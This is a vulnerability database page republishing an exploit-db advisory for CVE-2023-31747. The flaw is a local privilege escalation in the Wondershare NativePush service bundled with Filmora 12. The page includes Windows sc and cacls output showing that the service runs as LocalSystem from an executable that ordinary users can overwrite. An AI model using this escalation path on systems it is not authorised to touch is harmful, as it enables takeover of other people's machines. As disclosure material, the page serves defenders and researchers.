Vulners
Lucene search
Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation
๐๏ธย 25 May 2023ย 00:00:00Reported byย Thurein SoeTypeย 
ย exploitdb๐ย www.exploit-db.com๐ย 399ย Views
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Exploit for Unquoted Search Path or Element in Wondershare Filmora | 24 Apr 202316:36 | โ | githubexploit |
 | Filmora 12 Build 1.0.0.7 Unquoted Service Path Vulnerability | 19 May 202300:00 | โ | zdt |
| Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation Vulnerability | 26 May 202300:00 | โ | zdt |
 | CVE-2023-31747 | 23 May 202323:15 | โ | attackerkb |
 | CVE-2023-31747 | 15 Jan 202411:02 | โ | circl |
 | Filmora ไปฃ็ ้ฎ้ขๆผๆด | 20 May 202300:00 | โ | cnnvd |
 | CVE-2023-31747 | 23 May 202300:00 | โ | cve |
 | CVE-2023-31747 | 23 May 202300:00 | โ | cvelist |
 | EUVD-2023-36038 | 3 Oct 202520:07 | โ | euvd |
 | CVE-2023-31747 | 23 May 202323:15 | โ | nvd |
10
# Exploit Title: Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation
# Date: 20 May 2023
# Exploit Author: Thurein Soe
# Vendor Homepage: https://filmora.wondershare.com
# Software Link: https://mega.nz/file/tQNGGZTQ#E1u20rdbT4R3pgSoUBG93IPAXqesJ5yyn6T8RlMFxaE
# Version: Filmora 12 ( Build 1.0.0.7)
# Tested on: Windows 10 (Version 10.0.19045.2965)
# CVE : CVE-2023-31747
Vulnerability description:
Filmora is a professional video editing software. Wondershare NativePush
Build 1.0.0.7 was part of Filmora 12 (Build 12.2.1.2088). Wondershare
NativePush Build 1.0.0.7 was installed while Filmora 12 was installed. The
service name "NativePushService" was vulnerable to unquoted service paths
vulnerability which led to full local privilege escalation in the affected
window operating system as the service "NativePushService" was running with
system privilege that the local user has write access to the directory
where the service is located. Effectively, the local user is able to
elevate to local admin upon successfully replacing the affected executable.
C:\sc qc NativePushService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: NativePushService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME :
C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare
NativePush\WsNativePushService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare Native Push Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\cacls "C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare
NativePush\WsNativePushService.exe"
C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare
NativePush\WsNativePushService.exe
BUILTIN\Users:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
HNINKAYTHAYAR\HninKayThayar:(ID)FData
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 May 2023 00:00Current
8High risk
Vulners AI Score8
CVSS 3.17.8
EPSS0.01038
SSVC